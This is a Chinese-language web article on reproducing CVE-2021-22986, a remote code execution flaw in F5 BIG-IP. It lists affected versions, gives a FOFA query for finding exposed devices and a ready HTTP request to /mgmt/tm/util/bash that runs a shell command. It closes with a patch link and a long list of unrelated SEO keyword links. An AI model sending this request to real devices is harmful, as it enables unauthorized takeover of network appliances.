怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。F5 BIG-IPF5 BIG-IP
千家信息网最后更新 2025年01月20日怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
F5 BIG-IP
F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。
漏洞简介
F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。
影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
漏洞复现
fofa搜索关键词:
body="F5 Networks, Inc"
打开首页如下:
构造请求数据包,执行任意命令:
POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.123:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json{"command":"run","utilCmdArgs":"-c id"}
修复建议
F5官方已发布相关安全更新,广大用户需及时更新到最新版本。
下载链接:
https://support.f5.com/csp/article/K02566623
关于怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
代码
链路
内容
命令
更多
版本
帮助
控制
更新
管理
不错
最大
安全
下一代
关键
关键词
兴趣
可用性
地址
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
微信线本数据库
属于软件开发阶段的
蓬莱游戏软件开发企业
网络安全性增强
智慧医养软件开发公司
刀片机服务器安装
重庆盈环网络技术
sql的服务器名称
智慧法院网络安全隐患
众盟互联网科技有限公司
美国安全部承认使用数据库追踪
数据库软件讲座心得体会
深圳华强电子世界网络技术
access数据库看图表
app软件开发参数
百元购物软件开发
软件开发团队的建议
交通网络安全自查报告
服务器安全审计策略
网络安全有多重要性
数据库教程视频
服务器64T价格
湖南软件开发培训学院
盈科数据库图书馆
数据库规则技术文档
春雨网络技术有限公司
美国安全部承认使用数据库追踪
全民国家安全教育网络安全小常识
网络安全pikachu平台
dba数据库专家讲堂